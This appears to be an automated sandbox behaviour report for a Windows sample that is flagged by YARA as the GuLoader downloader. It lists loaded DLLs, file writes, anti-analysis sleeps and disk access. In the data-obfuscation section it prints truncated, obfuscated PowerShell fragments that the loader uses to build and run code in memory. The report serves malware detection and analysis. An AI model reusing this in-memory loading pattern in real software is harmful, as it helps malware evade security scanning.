Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe

File written: C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Renato.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: qNNwDeb9BY.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000001.00000002.1437068539.000000000B0FC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2117314337.000000000537C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Underliggendes $Echoer $Pluripotence), (Roofmen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Overfilter = [AppDomain]::CurrentDomain.GetAssemblies()$glo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fanatikeren)), $Rivierandividually).DefineDynamicModule($molgula, $false).DefineType($Lete, $Kreolsk, [System.MulticastDelegate])$Unde

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5741			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4027			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6852	Thread sleep time: -7378697629483816s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7060	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Code function: 0_2_004065AA FindFirstFileW,FindClose,	0_2_004065AA
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Code function: 0_2_00402B75 FindFirstFileW,	0_2_00402B75
Source: C:\Users\user\Desktop\qNNwDeb9BY.exe	Code function: 0_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004066F4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000001.00000002.1425935127.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1425935127.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\Gr
Source: powershell.exe, 00000001.00000002.1425935127.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\Gr
Source: powershell.exe, 00000001.00000002.1425935127.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1425935127.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\Gr
